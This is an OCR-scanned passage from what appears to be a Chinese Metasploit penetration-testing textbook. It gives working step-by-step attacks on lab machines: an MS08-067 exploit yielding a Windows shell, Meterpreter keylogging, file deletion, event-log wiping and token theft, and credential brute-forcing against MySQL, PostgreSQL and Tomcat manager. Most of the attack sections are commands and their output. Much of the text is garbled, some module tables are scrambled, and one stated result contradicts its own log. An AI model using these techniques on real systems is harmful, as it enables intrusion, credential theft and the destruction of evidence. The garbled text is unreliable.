reflective loader 
windows/dns txt query exec 


record(s) and executes the returned payload 


windows/vncinject/reverse tcp allports 


Connect back to the attacker, Inject a DLL via a 


Performs a TXT query against a series of DNS 


Try to connect back to the attacker, on all possible 


ports (1-65535, slowly), Inject a VNC DII via a reflective loader (staged) 


windows/vncinject/reverse tcp dns 
a reflective loader (staged) 


Connect back to the attacker, Inject a VNC DII via 


输出 的 信息 显示 了 ms08 067 netapi 模块 可 用 的 攻击 载 集 。 该 模块 可 以 攻击 的 载 何 很 


由 于 章 市 的 原因 ， 中 间 部 分 使 用 省 略 写 


) BUNT. 


(3) 这 里 选择 使 用 shell bind/tep 攻击 载 何 进行 渗透 测试 。 如 下 上 所 未: 


root@kali:~# msfcll windows/smb/ms08_067_netapi 


windows/shell/bind_tcp E 
[*] Initializing modules... 
RHOST => 192.168.41.146 


PAYLOAD => windows/shell/bind_tcp 
[*] Started bind handler 


[*] Automatically detecting the target... 


RHOST=192.168.41.146 PAYLOAD- 


[*] Fingerprint: Windows XP - Service Pack 0 / 1 - lang:Chinese - Traditional 
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[*] Selected Target: Windows XP SPO/SP1 Universal 

[*] Attempting to trigger the vulnerability... 

[*] Encoded stage with x86/shikata ga nai 

[*] Sending encoded stage (267 bytes) to 192.168.41.146 

[*] Command shell session 1 opened (192.168.41.156:60335 -> 192.168.41.146:4444) at 
2014-06-06 10:12:06 +0800 

Microsoft Windows XP [版 本 5.1.2600] 

(C) 版 权 所 有 1985-2001 Microsoft Corp. 

C:\WINDOWS\system32> 


从 输出 的 信息 中 ,可 以 看 到 成 功 的 从 远程 系统 上 拿 到 了 一 个 Windows 命令 行 的 Shell. 
这 表示 渗透 攻击 成 功 。 


6.3 控制 Meterpreter 


Meterpreter 是 Metasploit HER PA —ThAS Fld, X8 EAA D Td Jes E] ccr np Pr AE 
H, Xd CE fie d a BE WS X [Rd J^ A eo EH] Armitage, MSFCLI 或 
MSFCONSOLE 获取 到 目标 系统 上 的 一 个 Meterpreter 连接 时 ， 用 户 必 须 使 用 Meterpreter 
传递 攻击 载 集 。MSFCONSOLE 用 于 管理 用 户 的 会 话 ， 而 Meterpreter 则 是 攻击 载 集 和 渗透 
攻击 交互 。 本 市 将 介绍 Meterpreter 的 使 用 。 
Meterpreter 包括 的 一 些 常见 命令 如 下 所 示 。 

help: 但 看 帮助 信息 。 
background: 人 允许 用 户 在 后 台 Meterpreter 会 话 。 
download: 允许 用 户 从 入 侵 主 机 上 下 载 文 件 。 
upload: 人 允许 用 户 上 传 文件 到 入 侵 主 机 。 
execute: 允许 用 户 在 入 侵 主 机 上 执行 命令 。 
shell: 人 允许 用 户 在 入 侵 主 机 上 XÆ Windows 主机 ) 运行 Windows shell 命令 。 
session -i: 人 允许 用 户 切 换 会 话 。 
通过 打开 MSFCONSOLE 实现 控制 。 具 体操 作 步 又 如 下 所 示 。 
(1) 在 MSFCONSOLE 上 启动 一 个 活跃 的 会 话 。 
(2) 通过 利用 系统 的 用 户 局 动 登录 键盘 输入 。 执 行 命 令 如 下 所 示 : 
meterpreter > keyscan start 
Starting the keystroke sniffer... 
从 输出 的 信息 中 可 以 看 到 键盘 得 入 别 探 已 司 动 。 
(3) 捕获 漏洞 系统 用 户 的 键盘 输入。 执行 命令 如 下 所 示 : 
meterpreter > keyscan_dump 
Dumping captured keystrokes... 

<Return> www.baidu.com <Return> aaaa <Return> <Back> <Back> <Back> <Back> 
<Back> 
以 上 输出 的 信息 表示 在 漏洞 系统 中 用 户 输入 了 www.baidu.com, aaaa 及 回 车 键 、 退 出 键 。 
(4) 停止 捕获 漏洞 系统 用 户 的 键盘 输入 。 执 行 命 令 如 下 所 示 : 


meterpreter > keyscan_stop 


DODODODODDD 
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Stopping the keystroke sniffer... 
My E ER f As n AB BE Sd AR LE 
C50 删除 漏洞 系统 上 的 一 个 文件 。 执 行 命令 如 下 所 示 : 
meterpreter > del exploited.docx 
(6) 清除 漏洞 系统 上 的 事件 日 疡 。 执 行 命令 如 下 所 未: 


meterpreter > clearev 
[*] Wiping 57 records from Application... 


[*] Wiping 107 records from System... 
[*] Wiping 0 records from Security... 


CD 查看 正在 运行 的 进程 列表 。 执 行 命令 如 下 所 示 : 


meterpreter > ps 


Process List 
a | De od ot |B) Name Arch Session User Path 
0 0 [System Process] 4294967295 
4 0 System x86 0 
204 1676 notepad.exe x86 0 AA-886OKJM26FSV\\Test C:WINDOWS\ 
System32\ notepad.exe 
500672 vmtoolsd.exe x86 0 NT AUTHORITY SYSTEM C:\Program 
Files\VMware\VMware To ols\vmtoolsd.exe 
540 4 smss.exe x86 0 NT AUTHORITY\SYSTEM\ SystemRoot\ 
System32\smss.exe 
5/6 120 conime.exe x86 0  AA-8860KJV26FSWTest C:\WINDOWS\ 
System32\conime.exe 
604 540 csrss.exe x86 0 NT AUTHORITY\SYSTEM\??\ 
C:\WINDOWS\ system32\csrss.exe 
628 540 winlogon.exe x86 0 NT AUTHORITY\SYSTEM\??\ 
CAWINDOWSY system32\winlogo n.exe 
884 1456  TPAutoConnect.exe x86 0 AA-886OKJM26FSW\Test C:\Program 
Files\VMware\VMwar e Tools\TPAutoConnect.exe 
964 672 svchost.exe x86 0 NT AUTHORITY\SYSTEM 
1724 1544 vmtoolsd.exe x86 0 AA-886OKJM26FSW\Test C:\Program 
Files\VMware\VMware To ols\vmtoolsd.exe 
1732 2040 notepad.exe x86 0 AA-886OKJM26FSVW\Test 
C:\WINDOWS\System32\notepad.exe 
1736 1544 ctfmon.exe x86 0 AA-886OKJM26FSW\Test 
C\WINDOWS\System32\ctfmon.exe 
1920 964 wuauclt.exe x86 0 AA-886OKJM26FSW\Test 
C:\WINDOWS\System32\wuauclt.exe 
1952 736 notepad.exe x86 0 AA-886OKJM26FSVW\Test 
C:’\WINDOWS\System32\notepad.exe 
1956 1544  IEXPLORE.EXE x86 0 AA-886OKJM26FSW\Test C:\Program 
Files\Internet Explorer\iexp lore.exe 
2000 1/64 notepad.exe x86 0 AA-886OKJM26FSVW\Test 
C\WINDOWS\System32\notepad.exe 
2040 1544  IEXPLORE.EXE x86 0 AA-886OKJM26FSW\Test C:\Program 


Files\Internet Explorer\iexp lore.exe 

和 输出 的 信息 显示 了 漏洞 系统 中 正在 运行 的 所 有 进程 ， 包 括 进 程 的 ID 号 、 进 程 名 、 系 
FARR. FAP BEAT BEY AY BR EE 

(8) 使 用 kill AAI ARS aE HERE S. TAT ATS AM FAR: 

meterpreter > kill 2040 


è 1575 
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Killing: 2040 
(9) ik Mia RSC BCH She. PAT ATS AE P AS: 


meterpreter > steal_token 
AFE: 使 用 不 同 的 模块 ， Meterpreter 中 的 命令 是 不 同 的 。 有 些 模 块 中 ， 可 能 不 存在 以 上 
命令 ， 


6.4 渗透 攻击 应 用 


前 面 依次 介绍 了 Armitage, MSFCONSOLE 和 MSFCLI 接口 的 概念 及 使 用 。 本 节 将 介 
ZH EH] MSFCONSOLE 工具 渗透 攻击 MySQL 数据 库 服务 、PostgreSQL 数据 库 服 务 、Tomcat 
服务 和 PDF 文件 等 。 


6.4.1 渗透 攻击 MySQL 数据 库 服 务 


MySQL 是 一 个 关系 型 数据 库 管 理 系 统 , 由 瑞典 MySQL AB 公司 开发 , 目前 属于 Oracle 
公司 。 在 Metasploitable RF, MySQL 的 身份 认证 存在 漏洞 。 该 漏洞 有 可 能 会 让 淤 在 的 
攻击 者 不 必 提 供 正 确 的 身份 证 书 便 可 访问 MySQL 数据 库 。 所 以 ， 用 户 可 以 利用 该 漏洞 ， 
对 MySQL 服务 进行 渗透 攻击 ,恰好 Metasploit 框架 提供 了 一 套 针 对 MySQL 数据 库 的 辅助 
模块 ， 可 以 帮助 用 户 更 有 效 的 进行 渗透 测试 。 本 小 节 将 介绍 使 用 Metasploit 的 MySQL 14 
描 模块 渗透 攻击 MySQL 数据 库 服 务 。 渗 透 攻 击 Metasploitable 系统 中 MySQL 数据 库 服务 
的 具体 操作 步骤 如 下 所 示 。 

(1) 启动 MSFCONSOLE。 执 行 命令 如 下 所 示 : 


root@kali:~# msfconsole 


(2) 扫描 所 有 有 效 的 MySQL 模块 。 执 行 命令 如 下 所 示 ; 


msf > search mysql 
Matching Modules 


Name Disclosure Date Rank 
Description 


auxiliary/admin/http/rails_devise_pass reset 2013-01-28 normal Ruby on Rails Devise 


Authentication 00:00:00 UTC Password Reset 

auxiliary/admin/mysql/mysql_enum normal MySQL Enumeration Module 

auxiliary/admin/mysql/mysql_ sql normal MySQL SQL Generic Query 

auxiliary/admin/tikiwiki/tikidblib 2006-11-01normal TikiWiki Information Disclosure 
00:00:00 UTC 

auxiliary/analyze/jtr mysql fast normal John the Ripper MySQL 

Password Cracker (Fast Mode) 

auxiliary/pro/webaudit/sgli blind timing mysql normal PRO: MySQL blind SQL 

injection module (timing) 

auxiliary/scanner/mysql/mysql_authbypass 2012-06-09 normal MySQL Authentication 

Bypass 

_hashdump 00:00:00 UTC Password Dump 


auxiliary/scanner/mysql/mysql file enum normal MYSQL File/Directory Enumerator 
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auxiliary/scanner/mysql/mysql_hashdump normal 
auxiliary/scanner/mysql/mysql login normal 
auxiliary/scanner/mysql/mysql_schemadump normal 
auxiliary/scanner/mysql/mysql_ version normal 


auxiliary/server/capture/mysql normal 


exploit/linux/mysql/mysql_yassl_getname 2010-01-25 
CertDecoder::GetName 

00:00:00 UTC 
exploit/linux/mysql/mysql_ yassl hello 2008-01-04 
Hello Message 

00:00:00 UTC 
exploit/pro/web/sqli_mysql 2007-06-05 
MySQL 

00:00:00 UTC 
exploit/pro/web/sqli_mysql_php 2000-05-30 
MySQL 

00:00:00 UTC 
exploit/unix/webapp/kimai sqli 2013-05-21 
restore.php' SQL 

00:00:00 UTC 
exploit/unix/webapp/wp google document 2013-01-03 
Google Document 
. embedder exec 00:00:00 UTC 
Disclosure 
exploit/windows/mysql/mysql mof 2012-12-01 
Microsoft Windows 

00:00:00 UTC 
exploit/windows/mysql/mysql payload 2009-01-16 
Microsoft Windows 

00:00:00 UTC 
exploit^windows/mysql/mysql yassl hello 2008-01-04 
Hello Message 

00:00:00 UTC 
exploit/windows/mysql/scrutinizer 2012-07-27 


NetFlow and sFlow 
upload exec 00:00:00 UTC 
post/linux/gather/enum configsnormal 


post/linux/gather/enum users history 
msf > 


normal 


MYSQL Password Hashdump 
MySQL Login Utility 

MYSQL Schema Dump 

MySQL Server Version Enumeration 
Authentication Capture: MySQL 


goodMySQL yaSSL 


Buffer Overflow 
good MySQL yaSSL SSL 


Buffer Overflow 


manual SQL injection exploit for 


manual SQL injection exploit for 


average Kimai | v0.92  'db 
Injection 

normal WordPress Plugin 
Embedder Arbitrary File 
excellent Oracle MySQL for 
MOF Execution 

excellent Oracle MySQL for 


Payload Execution 
average MySQL yaSSL SSL 


Buffer Overflow 


excellent Plixer Scrutinizer 


Analyzer 9 Default MySQL Credential 
Linux Gather Configurations 
Linux Gather User History 


输出 的 信息 显示 了 MySQL 上 可 用 的 模块 。 从 这 些 模块 中 ， 选 择 渗 透 攻 击 的 模块 进行 


攻击 。 
(3) 这 里 使 用 MySQL 扫 拉 模块。 执行 命令 如 下 所 示 : 


msf > use auxiliary/scanner/mysql/mysql_login 
msf auxiliary(mysql_login) > 


(4) 显示 模块 的 有 效 选 项 。 执 行 命 令 如 下 所 示 : 


msf auxiliary(mysql_login) > show options 
Module options (auxiliary/scanner/mysql/mysql_ login): 
Name Current Setting Required 


BLANK PASSWORDS true no 
BRUTEFORCE SPEED 5 yes 
DB ALL CREDS false no 
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Description 
Try blank passwords for all users 
How fast to bruteforce, from 0 to 5 
Try each user/password couple stored in the 
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current database 


DB ALL PASS false no Add all passwords in the current database to the 
list 
DB ALL USERS false no Add all users in the current database to the list 
PASSWORD no A specific password to authenticate with 
PASS FILE no File containing passwords, one per line 
RHOSTS yes The target address range or CIDR identifier 
RPORT 3306 yes The target port 
STOP ON SUCCESS false yes Stop guessing when a credential works for a host 
THREADS 1 yes The number of concurrent threads 
USERNAME no A specific username to authenticate as 
USERPASS FILE no File containing users and passwords separated by 
space, one 

pair per line 
USER AS PASS true no Try the username as the password for all users 
USER FILE no File containing usernames, one per line 
VERBOSE true yes Whether to print output for all attempts 


以 上 的 信息 显示 了 在 mysql login 模块 下 可 设置 的 选项 。 从 输出 的 结 末 中 可 以 看 到 显 
示 了 四 列 信息 ， 分 别 是 选项 名 称 、 当 前 设置 、 需 求 及 摘 述 。 其 中 Required 为 yes 的 选项 是 
必须 配置 的 ， 反 之 可 以 不 用 配置 。 对 于 选项 的 作用 ，Description 都 有 相应 的 介绍 。 

(50 为 渗透 攻击 指定 目标 系统 、 用 户 文 件 和 密码 文件 的 位 置 。 执 行 命令 如 下 所 示 : 


msf auxiliary(mysql_login) > set RHOSTS 192.168.41.142 

RHOST => 192.168.41.142 

msf auxiliary(mysql_login) > set user file /root/Desktop/usernames.txt 
user_file => /root/Desktop/usernames.txt 


msf auxiliary(mysql_login) > set pass file /root/Desktop/passwords.txt 
pass file => /root/Desktop/passwords.txt 


以 上 信息 设置 了 目标 系统 的 地 址 ， 用 户 文件 和 密码 文件 的 路 径 。 
(6) 启动 渗透 攻击 。 执 行 命令 如 下 所 示 : 


msf auxiliary(mysql_ login) > exploit 
[deprecated] |18n.enforce_available_locales will default to true in the future. If you really want to 
skip validation of your locale you can set l18n.enforce available locales = false to avoid this 


message. 
[*] 192.168.41.142:3306 MYSQL - Found remote MySQL version 5.0.51a 


[*] 192.168.41.142:3306 MYSQL - [01/40] - Trying username:'sa' with password:" 

[-] Access denied 

[*] 192.168.41.142:3306 MYSQL - [02/40] - Trying username:'root' with password:" 
[+] 192.168.41.142:3306 - SUCCESSFUL LOGIN 'root' : " 

[*] 192.168.41.142:3306 MYSQL - [03/40] - Trying username:'bob' with password:" 

[-] Access denied 

[*] 192.168.41.142:3306 MYSQL - [04/40] - Trying username:'ftp’ with password:" 

[-] Access denied 

[*] 192.168.41.142:3306 MYSQL - [05/40] - Trying username:'apache' with password:" 
[-] Access denied 

[*] 192.168.41.142:3306 MYSQL - [06/40] - Trying username:'named' with password:" 


[-] Access denied 
[*] 192.168.41.142:3306 MYSQL - [07/40] - Trying username:'sa' with password:'sa' 
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[-] Access denied 
[*] 192.168.41.142:3306 MYSQL - [35/40] - Trying username: named with password:'password' 


[-] Access denied 
[*] Scanned 1 of 1 hosts (100% complete) 


[*] Auxiliary module execution completed 


输出 的 信息 是 渗透 攻击 的 一 个 过 程 , SEAT Ee A A/S OEE 4 
fyi Re MySQL 服务 占 。 在 渗透 攻击 过 程 中 ，Metasploit 会 尝试 输入 用 望 名 和 密码 文件 包含 
的 用 户 名 和 密码 组 合 。 从 输出 的 信息 中 可 以 看 到 ， 己 测试 出 MySQL 数据 库 服务 器 的 用 户 
名 和 密码 分 别 是 root 和 password. 


6.4.2 渗透 攻击 PostgreSQL AEH ARS 


PostgreSQL 是 一 个 目 由 的 对 象 一 一 关系 数据 库 服 务 〈 数 据 库 管理 系统 ) 。 它 在 灵活 的 
BSD- 风 格 许可 证 下 发 行 。 当 第 一 次 启动 msfconsole I, Kali 中 的 Metasploit 会 创建 名 称 为 
msf3 的 PostgreSQL 数据 库 ， 并 生成 保存 渗透 测试 数据 所 需 的 数据 表 。 然 后 ， 使 用 名 称 为 
msf3 的 用 户 ， 目 动 连接 到 msfB 数据 库 。 所 以 ， 攻 击 者 可 以 利用 这 样 的 漏洞 目 动 的 连接 到 
PostgreSQL 数据 库 。 本 小 节 将 介绍 使 用 Metasploit 的 PostgreSQL 扫 摘 模块 渗透 攻击 
PostgreSQL 数据 库 服 务 。 渗 透 攻 击 PostgreSQL 数据 库 服务 的 具体 操作 步骤 如 下 所 示 。 

(1) 启动 MSFCONSOLE。 执 行 命令 如 下 所 示 : 


root@kali:~# msfconsole 


(2) 搜索 所 有 有 效 的 PostgreSQL 模块 。 执 行 命 令 如 下 所 示 : 


msf > search postgresql 
Matching Modules 


Name Disclosure Date Rank Description 


auxiliary/admin/http/rails devise pass reset 2013-01-28 normal Ruby on Rails Devise 


00:00:00 UTC Authentication 
Password Reset 
auxiliary/admin/postgres/postgres readfile normal PostgreSQL Server Generic 
Query 
auxiliary/admin/postgres/postgres sql normal PostgreSQL Server Generic 
Query 
auxiliary/scanner/postgres/postgres _ normal PostgreSQL Database Name 
dbname flag injection Command Line Flag Injection 
auxiliary/scanner/postgres/postgres login normal PostgreSQL Login Utility 
auxiliary/scanner/postgres/postgres version normal PostgreSQL Version Probe 
auxiliary/server/capture/postgresql normal Authentication Capture: 
PostgreSQL 
exploit/linux/postgres/postgres payload 2007-06-05 excellent PostgreSQL for Linux 
Payload 

00:00:00 UTC Execution 
exploit/pro/web/sqli postgres 2007-06-05 manual SQL injection exploit for 
PostgreSQL 

00:00:00 UTC 
exploit/windows/postgres/postgres payload 2009-04-10 excellent PostgreSQL for 
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Microsoft Windows 
00:00:00 UTC Payload Execution 


以 上 信息 显示 了 PostgreSQL 所 有 相关 的 模块 。 此 时 可 以 选择 相应 的 模块 进行 攻击 。 
(3) 使 用 PostgreSQL 扫描 模块 。 执 行 命 令 如 下 所 示 : 


msf > use auxiliary/scanner/postgres/postgres login 
(4) ÆA PostgreSQL FRA ATA aI. PT SU rn: 


msf auxiliary(postgres_login) > show options 
Module options (auxiliary/scanner/postgres/postgres login): 


Name Current Setting Required Description 

BLANK true no Try blank passwords for all users 
PASSWORDS 
BRUTEFORCE 5 yes How fast to bruteforce, from 0 to 5 
SPEED 
DATABASE template1 yes The database to authenticate against 
DB ALL CREDS false no Try each user/password couple stored 
in the current database 
DB ALL PASS false no Add all passwords in the current 
database to the list 
DB ALL USERS false no Add all users in the current database to 
the list 
PASSWORD no A specific password to authenticate 
with 
PASS FILE lopt/metasploit/apps/pro/msf3/data/wordlists/postgres default pass.txt 

no File containing passwords, one per line 
RETURN ROWSET true no Set to true to see query result sets 
RHOSTS yes The target address range or CIDR 
identifier 
RPORT 5432 yes The target port 
STOP ON false yes Stop guessing when a credential works 
for a host 
SUCCESS 
THREADS 1 yes The number of concurrent threads 
USERNAME postgres no A specific username to authenticate as 
USERPASS FILE  /opt/metasploit/apps/pro/msf3/data/wordlists/postgres default userpass.txt 

no File containing (space-seperated) users 
and 

passwords, one pair per line 

USER AS PASS true no Try the username as the password for 
all users 
USER FILE lopt/metasploit/apps/pro/msf3/data/wordlists/postgres default user.txt 

no File containing users, one per line 
VERBOSE true yes Whether to print output for all attempts 


以 上 信息 显示 了 postgres login 模块 中 可 配置 的 选项 。 根 据 用 户 的 攻击 情况 , 选择 相应 
选项 进行 配置 。 
(5) 使 用 RHOST 选项 设置 目标 系统 〈 本 例 中 为 Metasploitable 2) 。 执 行 命令 如 下 所 示 : 


msf auxiliary(postgres_login) > set RHOSTS 192.168.41.142 
RHOST => 192.168.41.142 
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(6 六 指定 用 户 名 文件 。 执 行 命令 如 下 所 示 : 


msf auxiliary(postgres login) > set user file /usr/share/metasploit- framework/data/wordlists/ 
postgres default user.txt 
user file => /usr/share/metasploit-framework/data/wordlists /postgres default user.txt 


(7) 指定 密码 文件 。 执 行 命令 如 下 所 示 : 


msf auxiliary(postgres login) > set pass file /usr/share/metasploit- framework/data/wordlists/ 
postgres default pass.txt 
pass file => /usr/share/metasploit-framework/data/wordlists/ postgres default pass.txt 


(8) 运行 渗透 攻击 。 执 行 命令 如 下 所 示 : 


msf auxiliary(postgres_login) > exploit 
[*] 192.168.41.142:5432 Postgres - [01/21] - Trying username:postgres' with password:" on 
database 'template1' 
[-] 192.168.41.142:5432 Postgres - Invalid username or password: 'postgres':" 
[-] 192.168.41.142:5432 Postgres - [01/21] - Username/Password failed. 
[*] 192.168.41.142:5432 Postgres - [02/21] - Trying username:" with password:" on database 
'template 1' 
[-] 192.168.41.142:5432 Postgres - Invalid username or password: ":" 
[-] 192.168.41.142:5432 Postgres - [02/21] - Username/Password failed. 
[*] 192.168.41.142:5432 Postgres - [03/21] - Trying username:'scott' with password:" on database 
‘template’ 
[-] 192.168.41.142:5432 Postgres - Invalid username or password: 'scott’:" 
[-] 192.168.41.142:5432 Postgres - [03/21] - Username/Password failed. 
[*] 192.168.41.142:5432 Postgres - [04/21] - Trying username:'admin' with password:" on 
database 'template1' 
[-] 192.168.41.142:5432 Postgres - Invalid username or password: 'admin':" 
[-] 192.168.41.142:5432 Postgres - [04/21] - Username/Password failed. 
[+] 192.168.41.142:5432 Postgres - [05/21] - Trying username:'postgres' with 
password:'postgres' on database 'template1' 
[+] 192.168.41.142:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres' 
[+] 192.168.41.142:5432 Postgres - Success: postgres:postgres (Database 'template1' 


succeeded.) 
[*] 192.168.41.142:5432 Postgres - Disconnected 


[*] 192.168.41.142:5432 Postgres - [06/21] - Trying username:'scott' with password:'scott' on 


database 'template1' 

[-] 192.168.41.142:5432 Postgres - Invalid username or password: 'scott':'scott' 

[-] 192.168.41.142:5432 Postgres - [06/21] - Username/Password failed. 

[*] 192.168.41.142:5432 Postgres - [07/21] - Trying username:'admin' with password:'admin' on 


database 'template1' 
[-] 192.168.41.142:5432 Postgres - Invalid username or password: 'scott':'admin' 
[-] 192.168.41.142:5432 Postgres - [16/21] - Username/Password failed. 
[*] 192.168.41.142:5432 Postgres - [17/21] - Trying username:'admin' with password:'tiger’ on 
database template1 
[-] 192.168.41.142:5432 Postgres - Invalid username or password: admin tiger 
[-] 192.168.41.142:5432 Postgres - [17/21] - Username/Password failed. 
[*] 192.168.41.142:5432 Postgres - [18/21] - Trying username:'admin' with password:'postgres' on 
database 'template1' 
[-] 192.168.41.142:5432 Postgres - Invalid username or password: 'admin':'postgres' 
[-] 192.168.41.142:5432 Postgres - [18/21] - Username/Password failed. 
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[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 


以 上 输出 的 信息 是 PostgreSQL 渗透 攻击 的 一 个 过 程 。 测 试 到 PostgreSQL 数据 库 服务 
的 用 户 名 和 密码 分 别 是 Postgres 和 Postgres. 


6.4.3 渗透 攻击 Tomcat 服务 


Tomcat 服务 器 是 一 个 免费 的 开放 源 代 码 的 Web 应 用 服务 器 。 它 可 以 运行 在 Linux 和 
Windows 等 多 个 平台 上 。 由 于 其 性 能 稳定 、 扩 展 性 好 和 人 免费 等 特点 深 受 广大 用 户 的 喜爱 。 
目前 ， 互 联网 上 绝 大 多 数 Java Web 等 应 用 都 运行 在 Tomcat 服务 器 上 。Tomcat 默认 存在 一 
个 管理 后 台 ， 默 认 的 管理 地 址 是 http://IP 或 域名 :端口 Ananagerhtml。 通 过 此 后 台 ， 可 以 在 
不 重启 Tomcat 服务 的 情况 下 方便 地 部 署 、 司 动 、 停 止 或 外 载 Web 应 用 。 但 是 如 果 配 置 不 
当 的 话 就 存在 很 大 的 安全 隐患 。 攻 击 者 利用 这 个 漏洞 ， 可 以 非常 快速 、 轻 松 地 入 侵 一 台 服 
务 器 。 本 小 节 将 介绍 渗透 攻击 Tomcat 服务 的 方法 。 渗 透 攻 击 Tomcat 服务 的 具体 操作 步骤 
如 下 所 示 。 

(D 启动 MSFCONSOLE。 执 行 命令 如 下 所 示 : 


root@kali:~# msfconsole 


(2) 搜索 所 有 有 效 的 Tomcat 模块 。 执 行 命令 如 下 所 示 : 


msf > search tomcat 
Matching Modules 


Name Disclosure Date Rank Description 
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool 
Default Access 
auxiliary/admin/http/tomcat_utf8 _ normal Tomcat UTF-8 Directory Traversal 
Vulnerability 
traversal 
auxiliary/admin/http/trendmicro dlp - normal TrendMicro Data Loss Prevention 
5.5 Directory 
traversal Traversal 
auxiliary/dos/http/apache _ 2010-07-09 normal Apache Tomcat 
Transfer-Encoding Information 
tomcat_transfer_encoding 00:00:00 UTC Disclosure and DoS 
auxiliary/dos/http/hashcollision dos 2011-12-28 normal Hashtable Collisions 

00:00:00 UTC 
auxiliary/scanner/http/tomcat enum normal Apache Tomcat User Enumeration 
auxiliary/scanner/http/tomcat mgr - normal Tomcat Application Manager 
Login Utility 
login 
exploit/multi/http/struts_default_ 2013-07-02 . excellent Apache Struts 2 
DefaultActionMapper Prefixes 
action_mapper 00:00:00 UTC OGNL Code Execution 
exploit/multi/http/tomcat mgr . 2009-11-09 excellent Apache Tomcat Manager 
Application Deployer 
deploy 00:00:00 UTC Authenticated Code Execution 
post/windows/gather/enum tomcat normal Windows Gather Apache Tomcat 
Enumeration 


以 上 输出 的 信息 显示 了 Tomcat 服务 的 可 用 模块 。 现 在 用 户 可 以 选择 易 攻 击 的 模块 ， 
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进行 渗透 攻击 。 
(3) 使 用 Tomcat 管理 登录 模块 进行 渗透 攻击 。 执 行 命令 如 下 所 示 : 
msf auxiliary(postgres login) > use auxiliary/scanner/http/ tomcat mgr login 
(4) AF tomcat mgr login 模块 的 有 效 选 项 。 执 行 命令 如 下 所 示 : 


msf auxiliary(tomcat_mgr_login) > show options 
Module options (auxiliary/scanner/http/tomcat mgr login): 


Name Current Setting Required Description 
BLANK PASSWORDS true no Try blank passwords for all users 
BRUTEFORCE SPEED J yes How fast to bruteforce, from 0 to 5 
DB_ALL_CREDS false no Try each user/password couple stored in the 
current 
database 
DB_ALL_PASS false no Add all passwords in the current database to 
the list 
DB_ALL_USERS false no Add all users in the current database to the 
list 
PASSWORD no A specific password to authenticate with 
PASS_FILE 
/opt/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_pass.txt 

no File containing passwords, one per line 
Proxies no Use a proxy chain 
RHOSTS yes The target address range or CIDR identifier 
RPORT 8080 yes The target port 
STOP ON SUCCESS false yes Stop guessing when a credential works for a 
host 
THREADS 1 yes The number of concurrent threads 
URI /manager/html 

yes URI for Manager login. Default is 
/manager/html 
USERNAME no A specific username to authenticate as 


USERPASS FILE 
lopt/metasploit/apps/pro/msf3/data/wordlists/tomcat mgr default userpass.txt 
no File containing users and passwords 
separated by space, 
one pair per line 


USER AS PASS true no Try the username as the password for all 
users 
USER FILE 
lopt/metasploit/apps/pro/msf3/data/wordlists/tomcat mgr default users.txt 
no File containing users, one per line 
VERBOSE true yes Whether to print output for all attempts 
VHOST no HTTP server virtual host 


以 上 输出 的 信息 显示 了 tomcat mgr login 模块 中 有 效 的 选项 。 此 时 用 户 可 以 选择 相应 
的 模块 ， 进 行 配置 。 
(5) 设置 Pass File 选项 。 执行 命令 如 下 所 示 : 


msf auxiliary(tomcat_mgr_login) > set PASS_FILE /usr/share/metasploit- 
framework/data/wordlists/tomcat_mgr_default_pass.txt 
PASS FILE => /usr/share/metasploit-framework/data/wordlists/ tomcat mgr default pass.txt 


以 上 输出 的 信息 显示 了 指定 密码 文件 的 绝对 路 任 。 
(6) 设置 User File 选项 。 执 行 命 令 如 下 所 示 : 
msf auxiliary(tomcat_mgr_login) > set USER_FILE /usr/share/metasploit- 
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framework/data/wordlists/tomcat_mgr_default_users.txt 
USER_FILE => /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_users.txt 


DA EA th ERI fe A os S EP da SFY ACE BR Ao 
(7) 使 用 RHOSTS 选项 设置 目标 系统 〈 本 例 使 用 的 是 Metasploitable 2) 。 执 行 命令 如 
下 所 示 : 


msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.41.142 
RHOSTS => 192.168.41.142 


输出 的 信息 表示 指定 攻击 的 目标 系统 地 址 为 192.168.41.142。 
(8) 设置 RPORT 选项 为 8180。 执 行 命令 如 下 所 示 : 


msf auxiliary(tomcat_mgr_login) > set RPORT 8180 
RPORT => 8180 


EA FERRE IF BG Ab ASH in SA 8180. 

(9) 运行 渗透 攻击 。 执 行 命令 如 下 所 示 : 

msf > exploit 

[*] 192.168.41.142:8180 TOMCAT MGR - [01/63] - Trying username:" with password:" 


[-] 192.168.41.142:8180 TOMCAT MGR - [01/63] - /manager/html [Apache-Coyote/1.1] [Tomcat 
Application Manager] failed to login as " 

[*] 192.168.41.142:8180 TOMCAT MGR - [02/63] - Trying username:'admin' with password:" 

[-] 192.168.41.142:8180 TOMCAT MGR - [02/63] - /manager/html [Apache-Coyote/1.1] [Tomcat 
Application Manager] failed to login as 'admin' 

[*] 192.168.41.142:8180 TOMCAT MGR - [12/63] - Trying username:'xampp' with password:" 

[-] 192.168.41.142:8180 TOMCAT MGR - [12/63] - /manager/html [Apache-Coyote/1.1] [Tomcat 
Application Manager] failed to login as 'xampp' 

[*] 192.168.41.142:8180 TOMCAT MGR - [13/63 - Trying username:admin' with 
password:'admin' 

[-] 192.168.41.142:8180 TOMCAT MGR - [13/63] - /manager/html [Apache-Coyote/1.1] [Tomcat 
Application Manager] failed to login as 'admin' 

[*] 192.168.41.142:8180 TOMCAT MGR - [14/63] - Trying username:manager with 
password:'manager 

[-] 192.168.41.142:8180 TOMCAT MGR - [14/63] - /manager/html [Apache-Coyote/1.1] [Tomcat 
Application Manager] failed to login as 'manager' 

[*] 192.168.41.142:8180 TOMCAT MGR - [15/63] - Trying username:'role1' with password:'role1' 
[-] 192.168.41.142:8180 TOMCAT MGR - [15/63] - /manager/html [Apache-Coyote/1.1] [Tomcat 
Application Manager] failed to login as 'role1' 

[*] 192.168.41.142:8180 TOMCAT MGR - [16/63] - Trying username:'root' with password:'root 

[-] 192.168.41.142:8180 TOMCAT MGR - [16/63] - /manager/html [Apache-Coyote/1.1] [Tomcat 
Application Manager] failed to login as 'root' 

[x] 192.168.41.142:8180 TOMCAT MGR - [17/63] - Trying username:'tomcat with 
password:'tomcat 

[+] http://192.168.41.142:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application 
Manager] successful login 'tomcat' : ‘tomcat' 

[*] 192.168.41.142:8180 TOMCAT MGR - [18/63] - Trying username:'both' with password:'both' 
